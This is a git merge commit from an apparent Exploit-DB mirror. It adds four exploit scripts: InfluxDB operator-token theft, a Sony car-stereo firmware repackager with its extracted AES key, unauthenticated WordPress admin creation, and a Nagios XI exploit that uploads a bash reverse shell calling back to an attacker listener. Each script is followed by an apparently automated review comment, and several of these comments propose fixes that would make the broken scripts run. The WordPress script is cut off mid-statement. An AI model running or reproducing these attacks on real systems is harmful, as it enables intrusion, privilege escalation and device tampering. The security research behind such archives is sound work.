Merge remote-tracking branch 'exploitdb/main'

Brendan McDevitt 2025-04-10 00:01:14 +00:00
commit 6a8464a842
9 changed files with 1114 additions and 0 deletions

221
exploits/multiple/remote/52142.py Executable file

@ -0,0 +1,221 @@
# Exploit Title: InfluxDB OSS Operator Privilege Escalation via BusinessLogic Flaw
# Date: 22/03/2024
# Exploit Author: Andrea Pasin (Xenom0rph97)
# Researcher Homepage: https://xenom0rph97.github.io/xeno/
# GitHub Exploit repo: https://github.com/XenoM0rph97/CVE-2024-30896
# Software Link: https://www.influxdata.com/products/influxdb/
# Version: 2.x <=> 2.7.11
# Tested on: InfluxDB OSS 2.x
# CVE: CVE-2024-30896
# CVSS Base Score: 9.1
# CVSS v3.1 Vector: AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
# CVE-2024-30896
## Summary
A business logic flaw in influxdb allows users who own a valid allAccess
token to escalate their privileges at operator level by listing current
authorization tokens.
## Scenario
Attacker might be a user which was gained access by an administrator via an
allAccess token only within their organization.
This user's permissions will allow full control over the organization but
will still prevent him to interact with other orgs.
## Impact
This vulnerability would allow a user to obtain unrestricted access to the
influxdb instance. A similar condition might fully compromise
Confidentiality, Integrity and Availability of data owned by users of
different organizations. Additionally, since operator token has
administrative permissions, Availability and Integrity of the entire
influxdb instance might be compromised.
## Prerequisites/Limitations
1. Attacker must have a valid allAccess token
2. allAccess token must have been created in the same Org where an operator
token resides (ex. same Org as Admin user)
3. Attacker must be able to interact with influxdb instance via CLI or APIs
(influxClient)
## Steps to Reproduce
### Case 1: Exploitation via influxdb APIs:
*Python Version*: 3
*Requirements*: `influxdb_client==1.41.0`
*Script usage*
```
% python3 ./CVE-2024-30896.py -h
usage: CVE-2024-30896.py [-h] [-t TOKEN] [-e ENDPOINTURL] [-v [VERBOSE]]
[-vv [VVERBOSE]]
optional arguments:
-h, --help show this help message and exit
-t TOKEN, --token TOKEN
Custom or allAccess token to access influx DB
instance
-e ENDPOINTURL, --endpointUrl ENDPOINTURL
Endpoint Url of influxdb instance (ex. "
https://myInfluxdbInstance:8086/")
-v [VERBOSE], --verbose [VERBOSE]
Enable verbose logging - INFO
-vv [VVERBOSE], --vverbose [VVERBOSE]
Enable verbose logging - DEBUG
```
### Case 2: Exploitation via influx CLI
1. Execute: `influx auth ls -t <allAccessToken> | grep write:/orgs`. This
will list all current active operator tokens on the influxdb instance.
*Example*
```
# Using an allAccess token
influx auth ls -t U1OuqmFC{REDACTED} | grep U1OuqmFC{REDACTED}
0cc41c3b050e5000 U1OuqmFC{REDACTED}
admin 0cb9c92ee228b000 [read:orgs/87d0746948a3b3f5/authorizations
write:orgs/87d0746948a3b3f5/authorizations
read:orgs/87d0746948a3b3f5/buckets write:orgs/87d0746948a3b3f5/buckets
read:orgs/87d0746948a3b3f5/dashboards
write:orgs/87d0746948a3b3f5/dashboards read:/orgs/87d0746948a3b3f5
read:orgs/87d0746948a3b3f5/sources write:orgs/87d0746948a3b3f5/sources
read:orgs/87d0746948a3b3f5/tasks write:orgs/87d0746948a3b3f5/tasks
read:orgs/87d0746948a3b3f5/telegrafs write:orgs/87d0746948a3b3f5/telegrafs
read:/users/0cb9c92ee228b000 write:/users/0cb9c92ee228b000
read:orgs/87d0746948a3b3f5/variables write:orgs/87d0746948a3b3f5/variables
read:orgs/87d0746948a3b3f5/scrapers write:orgs/87d0746948a3b3f5/scrapers
read:orgs/87d0746948a3b3f5/secrets write:orgs/87d0746948a3b3f5/secrets
read:orgs/87d0746948a3b3f5/labels write:orgs/87d0746948a3b3f5/labels
read:orgs/87d0746948a3b3f5/views write:orgs/87d0746948a3b3f5/views
read:orgs/87d0746948a3b3f5/documents write:orgs/87d0746948a3b3f5/documents
read:orgs/87d0746948a3b3f5/notificationRules
write:orgs/87d0746948a3b3f5/notificationRules
read:orgs/87d0746948a3b3f5/notificationEndpoints
write:orgs/87d0746948a3b3f5/notificationEndpoints
read:orgs/87d0746948a3b3f5/checks write:orgs/87d0746948a3b3f5/checks
read:orgs/87d0746948a3b3f5/dbrp write:orgs/87d0746948a3b3f5/dbrp
read:orgs/87d0746948a3b3f5/notebooks write:orgs/87d0746948a3b3f5/notebooks
read:orgs/87d0746948a3b3f5/annotations
write:orgs/87d0746948a3b3f5/annotations read:orgs/87d0746948a3b3f5/remotes
write:orgs/87d0746948a3b3f5/remotes read:orgs/87d0746948a3b3f5/replications
write:orgs/87d0746948a3b3f5/replications]
# Listing all available tokens passing allAccess token and retrieving only
operator level tokens
influx auth ls -t U1OuqmFC{REDACTED} | grep write:/orgs
0cbb920e128e5000 gerKYLO0Ph_ibUk0y{REDACTED}
admin 0cb9c92ee228b000 [read:/authorizations write:/authorizations
read:/buckets write:/buckets read:/dashboards write:/dashboards read:/orgs
write:/orgs read:/sources write:/sources read:/tasks write:/tasks
read:/telegrafs write:/telegrafs read:/users write:/users read:/variables
write:/variables read:/scrapers write:/scrapers read:/secrets
write:/secrets read:/labels write:/labels read:/views write:/views
read:/documents write:/documents read:/notificationRules
write:/notificationRules read:/notificationEndpoints
write:/notificationEndpoints read:/checks write:/checks read:/dbrp
write:/dbrp read:/notebooks write:/notebooks read:/annotations
write:/annotations read:/remotes write:/remotes read:/replications
write:/replications]
influxdb_client==1.41.0
import influxdb_client
import argparse
import logging
import sys
argParser = argparse.ArgumentParser()
argParser.add_argument("-t", "--token", type=str, help="Custom or allAccess token to access influx DB instance")
argParser.add_argument("-e", "--endpointUrl", type=str, help="Endpoint Url of influxdb instance (ex. \"https://myInfluxdbInstance:8086/\")")
argParser.add_argument("-v", "--verbose", type=bool, const=True, nargs='?', help="Enable verbose logging - INFO")
argParser.add_argument("-vv", "--vverbose", type=bool, const=True, nargs='?', help="Enable verbose logging - DEBUG")
args = argParser.parse_args()
# Using user retrieved values or default (hardcoded) ones
all_access_token = "<allAccessToken>"
influx_endpoint_url = "<influxdbEndpointUrl>"
# Defining some colors
red = "\033[31m"
yellow = "\033[93m"
purple = "\33[1;95m"
green = "\033[0;92m"
cyan = "\033[96m"
bold ="\033[1m"
endc = "\033[39m"
if args.vverbose == True:
logging.basicConfig(level=logging.DEBUG)
elif args.verbose == True:
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger()
if args.token:
token = args.token
else:
logger.debug(f"{yellow}User did not set a token, using default one{endc}")
token = all_access_token
if args.endpointUrl:
endpointUrl = args.endpointUrl
else:
logger.debug(f"{yellow}User did not set an endpoint Url for influxdb, using default one{endc}")
endpointUrl = influx_endpoint_url
logger.info(f"{cyan}Connecting to influx DB instance{endc}")
# Connecting to influxdb instance
try:
conn = influxdb_client.InfluxDBClient(
url=endpointUrl,
token=token,
debug=False,
verify_ssl=True
)
# Verify InfluxDB connection
health = conn.ping()
if not health:
logger.error(f"{red}Unable to connect to db instace " + endpointUrl + f"{endc}")
print(f"{red}Quitting execution...{endc}")
sys.exit(1)
except Exception as e:
logger.error(f"{red}Failed to connect to db instance: " + endpointUrl + " Error: " + str(e) + f"{endc}")
print(f"{red}Quitting execution...{endc}")
sys.exit(1)
# Retrieving all current auths
logger.debug(f"{yellow}Retrieving all auth tokens{endc}")
print(f"{cyan}Enumerating current authorizations...{endc}")
try:
auths = conn.authorizations_api().find_authorizations()
except Exception as e:
logger.error(f"{red}Unable to retrieve authorizations. ERR: " + str(e) +f"{endc}")
print(f"{red}Unable to retrieve authorizations. Quitting...{endc}")
sys.exit(1)
if not auths:
print(f"{cyan}No Authorization tokens found on the instance{endc}")
sys.exit(1)
print(f"{cyan}{str(len(auths))} tokens found on the instance{endc}\n")
# Extracting operator token -> Parsing permissions to look for ("org = None" and "authType = write/auths"), not 100% efficiency -> TO OPTIMIZE
logger.debug(f"{yellow}Parsing auth permissions to retrieve operator tokens{endc}")
print(f"{cyan}Enumerating all operator tokens:{endc}")
op_tokens = []
# In order to understand if a token is of type "operator" we need to enumerate all permissions and look for "write/auths" on org 'None' -> Unrescticted access
try:
for auth in auths:
if auth.permissions:
for perm in auth.permissions:
if perm.action == "write" and perm.resource.org == None and perm.resource.type == "authorizations":
op_tokens.append(auth.token)
except Exception as e:
logger.error(f"{red}Unable to parse permissions on found authorizations. ERR: " + str(e) + f"{endc}")
print(f"{red}Unable to parse permissions on found authorizations. Quitting execution...{endc}")
sys.exit(1)
logger.info(f"{cyan}Printing all operator auth tokens{endc}")
print(f"{cyan}{str(len(op_tokens))} operator tokens found.\n\nListing all operator tokens:\n{endc}")
for op_t in op_tokens:
print(f"{green}{op_t}{endc}")
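Review bot: the file does not parse as Python in the form shown: everything from `## Summary` down to the bare `influxdb_client==1.41.0` line sits between the `#` header comments and `import influxdb_client` with neither a comment marker nor a docstring, so the interpreter raises a SyntaxError before reaching the imports; wrapping that block in a triple-quoted string, or prefixing each line with `#`, keeps the write-up and makes the script loadable. Two smaller points in the body: `type=bool` on the `-v`/`-vv` arguments turns any supplied string, including `False`, into True (use `action='store_true'`), and the operator-token test `perm.resource.org == None` should be `is None`. The predicate the script applies, a `write` permission on the `authorizations` resource with no org scope, is also the one an administrator can run with `influx auth ls` to inventory operator tokens before issuing allAccess tokens in the same org, which is the pre-condition the Prerequisites section names.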

355
exploits/multiple/remote/52143.py Executable file

@ -0,0 +1,355 @@
# Exploit Title: Sony XAV-AX5500 Firmware Update Validation Remote Code Execution
# Date: 11-Feb-2025
# Exploit Author: lkushinada
# Vendor Homepage: https://www.sony.com/et/electronics/in-car-receivers-players/xav-ax5500
# Software Link: https://archive.org/details/xav-ax-5500-v-113
# Version: 1.13
# Tested on: Sony XAV-AX5500
# CVE : CVE-2024-23922
# From NIST CVE Details:
# ====
# This vulnerability allows physically present attackers to execute arbitrary code on affected
# installations of Sony XAV-AX5500 devices. Authentication is not required to exploit this
# vulnerability. The specific flaw exists within the handling of software updates. The issue
# results from the lack of proper validation of software update packages. An attacker can leverage
# this vulnerability to execute code in the context of the device.
# Was ZDI-CAN-22939
# ====
# # Summary
# Sony's firmware validation for a number of their XAV-AX products relies on symetric cryptography,
# obscurity of their package format, and a weird checksum method instead of any real firmware
# signing mechanism. As such, this can be exploited to craft updates which bypass firmware validation
# and allow a USB-based attacker to obtain RCE on the infotainment unit.
# What's not mentioned in the CVE advisories, is that this method works on the majority of Sony's
# infotainment units and products which use a similar chipset or firmware package format. Tested
# to work on most firmware versions prior to v2.00.
# # Threat Model
# An attacker with physical access to an automotive media unit can typically utilize other methods
# to achieve a malicious outcome. The reason to investigate the firmware to the extent in this post
# is academic, exploratory, and cautionary, i.e. what other systems are protected in a similar
# manner? if they are, how trivial is it to bypass?
# # Disclaimer
# The information in this article is for educational purposes only.
# Tampering with an automotive system comes with risks which, if you don't understand, you should
# not be undertaking.
# THE AUTHORS DISCLAIM ANY AND ALL RESPONSIBILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES ARISING
# FROM THE USE OF ANYTHING IN THIS DOCUMENT.
# # The Unit
# ## Processors
# - DAC
# - System Management Controller (SMC)
# - Applications Processor
# - Display Processor
# Coming from a mobile and desktop computer environment, one may be use to thinking about
# the Applications Processor as the most powerful chip in the system in terms of processing power,
# size, power consumption, and system hierarchy. The first oddity of this platform is that the
# application processor is not the most powerful; that honor goes to the DAC, a beefy ARM chip on the
# board.
# The application processor does not appear to be the orchestrator of the components on the system.
# The SMC tkes which takes the role of watchdog, power state management, and input (think remote
# controls, steering wheel button presses) routing.
# For our purposes, it is the Applications processor we're interested in, as it is
# the system responsible for updating the unit via USB.
# ## Interfaces
# We're going to be attacking the unit via USB, as it's the most readily exposed
# interface to owners and would-be attackers.
# Whilst the applications processor does have a UART interface, the most recent iterations of the
# unit do not expose any headers for debugging via UART, and the one active UART line found to be
# active was for message passing between the SMC and app processor, not debug purposes. Similarly, no
# exposed JTAG interfaces were found to be readily exposed on recent iterations of the unit. Sony's
# documentation suggests these are not enabled, but this could not be verified during testing. At the
# very least, JTAG was not found to be exposed on an accessible interface.
# ## Storage
# The boards analyzed had two SPI NOR flash chips, one with an unencrypted firmware image on it. This
# firmware was RARd. The contents of SPI flash was analyzed to determine many of the details
# discussed in this report.
# ## The Updater
# Updates are provided on Sony's support website. A ZIP package is provided with three files:
# - SHDS1132.up6
# - SHMC1132.u88
# - SHSO1132.fir
# The largest of these files (8 meg), the .fir, is in a custom format, and appears encrypted.
# The FIR file has a header which contains the date of firmware publication, the strings KRSELCO and
# SKIP, a chunk of zeros, and then a highish entropy section, and some repeating patterns of interest:
# 00002070 b7 72 10 03 00 8c 82 7e aa d1 83 58 23 ef 82 5c |.r.....~...X#..\|
# *
# 00002860 b7 72 10 03 00 8c 82 7e aa d1 83 58 23 ef 82 5c |.r.....~...X#..\|
# 00744110 b7 72 10 03 00 8c 82 7e aa d1 83 58 23 ef 82 5c |.r.....~...X#..\|
# *
# 00800020 b7 72 10 03 00 8c 82 7e aa d1 83 58 23 ef 82 5c |.r.....~...X#..\|
# ## SPI Flash
# Dumping the contents of the SPI flash shows a similar layout, with slightly different offsets:
# 00001fe0 10 10 10 10 10 10 10 10 ff ff ff ff ff ff ff ff |................|
# 00001ff0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff |................|
# *
# 000027f0 ff ff ff ff ff ff ff ff ff ff ff ff 00 03 e7 52 |...............R|
# 00002800 52 61 72 21 1a 07 00 cf 90 73 00 00 0d 00 00 00 |Rar!.....s......|
#
# 0007fff0 ff ff ff ff ff ff ff ff ff ff ff ff 00 6c 40 8b |.............l@.|
# 00080000 52 61 72 21 1a 07 00 cf 90 73 00 00 0d 00 00 00 |Rar!.....s......|
# ...
# 00744090 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff |................|
# *
# 00778000
#
# This given the offsets and spacing, we suspect that the .FIR matches the contents of the SPI.
# Decompressing the RARs at the 0x2800 and 0x80000, we get the recovery and main applications.
# Once we remove the packaging bytes, seeing that the repetive patterns align with FF's, gives
# us a strong indication the encryption function is operating in an ECB-style configuration,
# giving us an avenue, even if we do not recover the key, to potentially make modifications
# to the firmware depending on how the checksum is being calculated.
# ## Firmware
# The recovery application contains the decompression, decryption and checksum methods.
# Putting the recovery_16.bin into ghidra and setting the memory map to load us in at 0x2800,
# we start taking a look at the relevant functions by way of:
# - looking for known strings (KRSELCO)
# - analyizing the logic and looking for obvious "if this passed, begin the update, else fail"
# - looking for things that look like encryption (loads of bitshifting math in one function)
# Of interest to us, there is:
# - 0x0082f4 - a strcmp between KRSELCO and the address the incoming firmware update is at, plus 0x10
# - 0x00897a - a function which sums the total number of bytes until we hit 0xA5A5A5A5
# - 0x02d4ce - the AES decryption function
# - 0x040dd4 - strcmp (?)
# - 0x040aa4 - memcpy (?)
# - 0x046490 - the vendor plus the a number an idiot would use for their luggage, followed by enough
# padding zeros to get us to a 16 byte key
# This gives us all the information we need, other than making some guesses as to the general package
# and header layout of the update package, to craft an update packager that allows arbitrary
# modification of the firmware.
# # Proof of Concept
# The PoC below will take an existing USB firmware update, decrypt and extract the main binary,
# pause whilst you make modifications (e.g. changing the logic or modifying a message), and repackage
# the update.
# ## Requirements
# - Unixish system
# - WinRar 2.0 (the version the Egyptians built the pyramids with)
# ## Usage
# cve-2024-23922.py path_to_winrar source.fir output.fir
import argparse
import sys
import os
import tempfile
import shutil
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.backends import default_backend
# Filenames as found in the .FIR
MAIN_BINARY_NAME="main_16.bin"
MAIN_RAR_NAME="main_16.rar"
DECRYPTED_FILE_NAME="decrypt.bin"
ENCRYPTED_FILE_NAME="encrypt.bin"
# Offsets in the .FIR
HEADER_LENGTH=0x80
RECOVERY_OFFSET=0x2800
MAIN_OFFSET=0x80000
CHECKSUM_OFFSET=0x800000-0x10
CHECKSUM_SIZE=0x4
RAR_LENGTH_OFFSET=0x4
RAR_LENGTH_SIZE=0x4
# From 0x46490 in recovery_16.bin
ENCRYPTION_KEY=b'\x54\x41\x4d\x55\x4c\x31\x32\x33\x34\x00\x00\x00\x00\x00\x00\x00'
def decrypt_file(input_file, output_file):
backend = default_backend()
cipher = Cipher(algorithms.AES(ENCRYPTION_KEY), modes.ECB(), backend=backend)
decryptor = cipher.decryptor()
with open(input_file, 'rb') as file:
ciphertext = file.read()
# Strip the unencrypted header
ciphertext = ciphertext[HEADER_LENGTH:]
decrypted_data = decryptor.update(ciphertext) + decryptor.finalize()
with open(output_file, 'wb') as file:
file.write(decrypted_data)
def aes_encrypt_file(input_file, output_file):
backend = default_backend()
cipher = Cipher(algorithms.AES(ENCRYPTION_KEY), modes.ECB(), backend=backend)
encryptor = cipher.encryptor()
with open(input_file, 'rb') as file:
plaintext = file.read()
ciphertext = encryptor.update(plaintext) + encryptor.finalize()
with open(output_file, 'wb') as file:
file.write(ciphertext)
def get_sony_32(data):
csum = int()
for i in data:
csum = csum + i
return csum % 2147483648 # 2^31
def validate_args(winrar_path, source_file, destination_file):
# Check if the WinRAR executable exists and is a file
if not os.path.isfile(winrar_path) or not os.access(winrar_path, os.X_OK):
print(f"[x] Error: The specified WinRAR path '{winrar_path}' is not a valid executable.")
sys.exit(1)
# Check if the source file exists
if not os.path.isfile(source_file):
print(f"[x] Error: The specified source file '{source_file}' does not exist.")
sys.exit(1)
# Read 8 bytes from offset 0x10 in the source file
try:
with open(source_file, 'rb') as f:
f.seek(0x10)
signature = f.read(8)
if signature != b'KRSELECO':
print(f"[x] Error: The source file '{source_file}' does not contain the expected signature.")
sys.exit(1)
except Exception as e:
print(f"[x] Error: Failed to read from '{source_file}': {e}")
sys.exit(1)
# Check if the destination file already exists
if os.path.exists(destination_file):
print(f"[x] Error: The destination file '{destination_file}' already exists.")
sys.exit(1)
def main():
parser = argparse.ArgumentParser(description="CVE-2024-23922 Sony XAV-AX5500 Firmware Modifier")
parser.add_argument("winrar_path", help="Path to WinRAR 2.0 executable (yes, the ancient one)")
parser.add_argument("source_file", help="Path to original .FIR file")
parser.add_argument("destination_file", help="Path to write the modified .FIR file to")
args = parser.parse_args()
validate_args(args.winrar_path, args.source_file, args.destination_file)
RAR_2_PATH = args.winrar_path
GOOD_FIRMWARE_FILE = args.source_file
DESTINATION_FIRMWARE_FILE = args.destination_file
# make temporary directory
workdir = tempfile.mkdtemp(prefix="sony_firmware_modifications")
# copy the good firmware file into the temp directory
temp_fir_file = os.path.join(workdir, os.path.basename(GOOD_FIRMWARE_FILE))
shutil.copyfile(GOOD_FIRMWARE_FILE, temp_fir_file)
print("[+] Cutting the head off and decrypting the contents")
decrypted_file_path = os.path.join(workdir, DECRYPTED_FILE_NAME)
decrypt_file(input_file=temp_fir_file, output_file=decrypted_file_path)
print("[+] Dump out the rar file")
with open(decrypted_file_path, 'rb') as file:
# right before the rar file there is a 4 byte length header for the rar file. get that.
file.seek(MAIN_OFFSET-RAR_LENGTH_OFFSET)
original_rar_length = int.from_bytes(file.read(RAR_LENGTH_SIZE), "big")
rar_file_bytes = file.read(original_rar_length)
# now dump that out
rar_file_path=os.path.join(workdir, MAIN_RAR_NAME)
with open(rar_file_path, 'wb') as rarfile:
rarfile.write(rar_file_bytes)
# check that the stat of the file matches what the header told us
dumped_rar_size = os.stat(rar_file_path).st_size
if dumped_rar_size != original_rar_length:
print("[!] extracted filesizes dont match, there may be corruption", dumped_rar_size, original_rar_length)
print("[+] Extracting the main binary from the rar file")
os.system("unrar x " + rar_file_path + " " + workdir)
print("[!] Okay, I'm now going to wait until you have had a chance to make modifications")
print("Please modify this file:", os.path.join(workdir, MAIN_BINARY_NAME))
input()
print("[+] Continuing")
print("[+] Putting your main binary back into the rar file")
os.system("wine " + RAR_2_PATH + " u -tk -ep " + rar_file_path + " " + workdir + "/" + MAIN_BINARY_NAME)
# we could fix this by writing some FFs
new_rar_size=os.stat(rar_file_path).st_size
if dumped_rar_size > os.stat(rar_file_path).st_size:
print("[!!] The rar size is smaller than the old one. This might cause a problem.")
print("[!!] Push any key to continue, ctrl+c to abort")
input()
with open(decrypted_file_path, 'r+b') as file:
# right before the rar file there is a 4 byte length header for the rar file. go back there
file.seek(MAIN_OFFSET-RAR_LENGTH_OFFSET)
# overwrite the old size with the new size
file.write(new_rar_size.to_bytes(RAR_LENGTH_SIZE, "big"))
print("[+] Deleting the old rar from the main container")
# delete the old rar from the main container by FFing it up
file.write(b'\xFF'*original_rar_length)
# seek back to the start
file.seek(MAIN_OFFSET)
print("[+] Loading the new rar back into the main container")
with open(rar_file_path, 'rb') as rarfile:
new_rarfile_bytes = rarfile.read()
file.write(new_rarfile_bytes)
print("[+] Updating Checksum")
with open(decrypted_file_path, 'rb') as file:
contents = file.read()
contents = contents[:-0x0010]
s32_sum = get_sony_32(contents)
with open(decrypted_file_path, 'r+b') as file:
file.seek(CHECKSUM_OFFSET)
# read out the current checksum
old_checksum_bytes=file.read(CHECKSUM_SIZE)
print("old checksum:", int.from_bytes(old_checksum_bytes, "big"), old_checksum_bytes)
# go back and update it with new checksum
print("new checksum:", s32_sum, hex(s32_sum))
new_checksum_bytes=s32_sum.to_bytes(CHECKSUM_SIZE, "big")
file.seek(CHECKSUM_OFFSET)
file.write(new_checksum_bytes)
print("[+] Encrypting the main container back up")
encrypted_file_path = os.path.join(workdir, ENCRYPTED_FILE_NAME)
aes_encrypt_file(decrypted_file_path, encrypted_file_path)
print("[+] Reattaching the main container to the header and writing to dest")
with open(DESTINATION_FIRMWARE_FILE, 'wb') as file:
with open(temp_fir_file, 'rb') as firfile:
header = firfile.read(HEADER_LENGTH)
file.write(header)
with open(encrypted_file_path, 'rb') as encfile:
enc_contents = encfile.read()
file.write(enc_contents)
print("[+] DONE!!! Any key to delete temp files, ctrl+c to keep them.")
input()
shutil.rmtree(workdir)
if __name__ == "__main__":
main()
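Review bot: `validate_args()` compares the 8 bytes at offset 0x10 with `b'KRSELECO'`, while the write-up and the strcmp it describes at 0x0082f4 use `KRSELCO` (seven letters); whichever spelling is the real marker, the other is a typo, and if the check is the wrong one every genuine .fir is rejected before any work is done, so this deserves a test against a known-good image. The `os.system("unrar x " + ...)` and `os.system("wine " + RAR_2_PATH + ...)` calls pass unquoted paths through the shell; `subprocess.run([...])` with an argument list avoids both breakage on paths containing spaces and the unintended command execution a crafted filename could cause. The Requirements section says "Unixish system" but the repack step runs WinRAR through `wine`, which should be listed as a requirement. On the substance, the write-up's own finding is the point to keep in view: the only integrity control is an additive checksum mod 2^31 over an ECB-encrypted body whose key is recoverable from the recovery image, which is why the remedy is a signature over the package rather than a stronger checksum.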


@ -0,0 +1,126 @@
# Exploit Title: WordPress User Registration & Membership Plugin <= 4.1.1 - Unauthenticated Privilege Escalation
# Exploit Author: Al Baradi Joy
# Date: 2025-04-07
# Vendor Homepage: https://wordpress.org/plugins/user-registration/
# Software Link:
https://downloads.wordpress.org/plugin/user-registration.4.1.1.zip
# Version: <= 4.1.1
# Tested on: WordPress 6.4.3
# CVSS: 9.8 (CRITICAL)
# CWE: CWE-269
# References:
# https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/user-registration/user-registration-membership-411-unauthenticated-privilege-escalation
# https://patchstack.com/database/wordpress/plugin/user-registration/vulnerability/wordpress-user-registration-membership-plugin-4-1-2-unauthenticated-privilege-escalation-vulnerability
# https://nvd.nist.gov/vuln/detail/CVE-2025-2563
import re
import json
import requests
import random
import string
from urllib.parse import urljoin
def banner():
print("\n[+] CVE-2025-2563 - WP User Registration Privilege Escalation")
print("[+] Made By Al Baradi Joy\n")
def randstring(n=8):
return ''.join(random.choices(string.ascii_lowercase, k=n))
def get_regex(content, pattern, group=1, name=""):
match = re.search(pattern, content)
if not match:
raise ValueError(f"[-] Could not extract {name} (Pattern:
{pattern})")
return match.group(group)
def exploit(target):
session = requests.Session()
username = randstring()
password = randstring() + "!@"
email = f"{username}@exploit.test"
try:
print("[+] Getting registration page...")
r = session.get(urljoin(target, "/membership-registration/"),
timeout=10)
r.raise_for_status()
page = r.text
nonce = get_regex(page,
r'"user_registration_form_data_save":"(.*?)"', name="nonce")
formid = get_regex(page, r"id='user-registration-form-([0-9]+)'",
name="formid")
memval = get_regex(page,
r'id="ur-membership-select-membership-([0-9]+)', name="membership value")
memname = get_regex(page,
r'data-field-id="membership_field_([0-9]+)"', name="membership field name")
front_nonce = get_regex(page, r'name="ur_frontend_form_nonce"
value="(.*?)"', name="frontend_nonce")
loc_nonce = get_regex(page, r'ur_membership_frontend_localized_data
= {"_nonce":"(.*?)"', name="localized_frontend_nonce")
print("[+] Submitting registration form...")
form_data = [
{"field_name": "user_login", "value": username, "field_type":
"text", "label": "Username"},
{"field_name": "user_email", "value": email, "field_type":
"email", "label": "User Email"},
{"field_name": "user_pass", "value": password, "field_type":
"password", "label": "User Password"},
{"field_name": "user_confirm_password", "value": password,
"field_type": "password", "label": "Confirm Password"},
{"value": memval, "field_type": "radio", "label": "membership",
"field_name": f"membership_field_{memname}"}
]
payload = {
"action": "user_registration_user_form_submit",
"security": nonce,
"form_data": json.dumps(form_data),
"form_id": formid,
"registration_language": "en-US",
"ur_frontend_form_nonce": front_nonce,
"is_membership_active": memval,
"membership_type": memval
}
r2 = session.post(urljoin(target, "/wp-admin/admin-ajax.php"),
data=payload, timeout=10)
if '"success":true' not in r2.text:
print("[-] Registration form failed.")
return
print("[+] Sending membership registration as administrator...")
member_payload = {
"action": "user_registration_membership_register_member",
"security": loc_nonce,
"members_data": json.dumps({
"membership": "1",
"payment_method": "free",
"start_date": "2025-3-29",
"username": username,
"role": "administrator"
})
}
r3 = session.post(urljoin(target, "/wp-admin/admin-ajax.php"),
data=member_payload, timeout=10)
if '"success":true' in r3.text:
print("[+] Exploit Successful!")
print(f"[+] Admin Username: {username}")
print(f"[+] Admin Password: {password}")
else:
print("[-] Membership escalation failed.")
except Exception as e:
print(f"[-] Exploit failed: {str(e)}")
if __name__ == "__main__":
banner()
target = input("Enter target WordPress site (e.g., http://example.com):
").strip().rstrip('/')
if not target.startswith("http"):
target = "http:
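Review bot: the hunk header announces 126 added lines but the rendered file stops mid-statement at `target = "http:`, so the `__main__` block is incomplete and the file would not parse as shown; the full copy should be checked against the archive entry before merging. The `# Software Link:` header line is followed by an uncommented URL on its own line, and several string literals appear split across lines (`raise ValueError(f"[-] Could not extract {name} (Pattern:` / `{pattern})")`, the `ur_frontend_form_nonce` and `ur_membership_frontend_localized_data` regexes, and the `input(...)` prompt); this looks like line wrapping from the rendering rather than the original source, but each is a SyntaxError if taken literally. The header also lacks the `# CVE:` line the other files carry, even though the banner and the NVD reference name CVE-2025-2563. For defenders, the script's two requests both go to `/wp-admin/admin-ajax.php`, the second with `action=user_registration_membership_register_member` and `"role": "administrator"` in `members_data`; an unauthenticated call to that action carrying a role field is the event to alert on, and the Patchstack reference identifies 4.1.2 as the fixed plugin version.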


@ -0,0 +1,90 @@
# Exploit Title: Nagiosxi authenticated Remote Code Execution
# Date: 17/02/2024
# Exploit Author: Calil Khalil
# Vendor Homepage: https://www.nagios.com/products/nagios-xi/
# Version: Nagios Xi 5.6.6
# Tested on: Ubuntu
# CVE : CVE-2019-15949
#
# python3 exp.py -t https://<target>/ -b /<nagiosxi-path>/ -u user -p 'password' -lh <rev-ip> -lp <rev-port> -k (ignore cert)
#
import argparse
import re
import requests
import urllib3
class Nagiosxi():
def __init__(self, target, parameter, username, password, lhost, lport, ignore_ssl):
self.url = target
self.parameter = parameter
self.username = username
self.password = password
self.lhost = lhost
self.lport = lport
self.ignore_ssl = ignore_ssl
self.login()
def upload(self, session):
print("Uploading Malicious Check Ping Plugin")
upload_url = self.url + self.parameter + "/admin/monitoringplugins.php"
upload_token = session.get(upload_url, verify=not self.ignore_ssl)
nsp = re.findall('var nsp_str = "(.*)";', upload_token.text)
print("Upload NSP Token: " + nsp[0])
payload = "bash -c 'bash -i >& /dev/tcp/" + self.lhost + "/" + self.lport + " 0>&1'"
file_data = {
"upload": "1",
"nsp": nsp[0],
"MAX_FILE_SIZE": "20000000"
}
file_upload = {
"uploadedfile": ("check_ping", payload, "application/octet-stream", {"Content-Disposition": "form-data"})
}
session.post(upload_url, data=file_data, files=file_upload, verify=not self.ignore_ssl)
payload_url = self.url + self.parameter + "/includes/components/profile/profile.php?cmd=download"
session.get(payload_url, verify=not self.ignore_ssl)
def login(self):
session = requests.Session()
login_url = self.url + self.parameter + "/login.php"
token = session.get(login_url, verify=not self.ignore_ssl)
nsp = re.findall('name="nsp" value="(.*)">', token.text)
print("Login NSP Token: " + nsp[0])
post_data = {
"nsp": nsp[0],
"page": "auth",
"debug": "",
"pageopt": "login",
"redirect": "",
"username": self.username,
"password": self.password,
"loginButton": ""
}
login = session.post(login_url, data=post_data, verify=not self.ignore_ssl)
if "Home Dashboard" in login.text:
print("Logged in!")
else:
print("Unable to login!")
self.upload(session)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='CVE-201915949 Nagiosxi authenticated Remote Code Execution')
parser.add_argument('-t', metavar='<Target base URL>', help='Example: -t http://nagios.url/', required=True)
parser.add_argument('-b', metavar='<Base Directory>', help="Example: -b /nagiosxi/", required=True)
parser.add_argument('-u', metavar='<Username>', help="Example: -a username", required=True)
parser.add_argument('-p', metavar='<Password>', help="Example: -p 'password'", required=True)
parser.add_argument('-lh', metavar='<Listener IP>', help="Example: -lh 127.0.0.1", required=True)
parser.add_argument('-lp', metavar='<Listener Port>', help="Example: -lp 1337", required=True)
parser.add_argument('-k', action='store_true', help="Ignore SSL certificate verification")
args = parser.parse_args()
urllib3.disable_warnings()
try:
print('CVE-2019-15949 Nagiosxi authenticated Remote Code Execution')
Nagiosxi(args.t, args.b, args.u, args.p, args.lh, args.lp, args.k)
except KeyboardInterrupt:
print("\nBye Bye!")
exit()
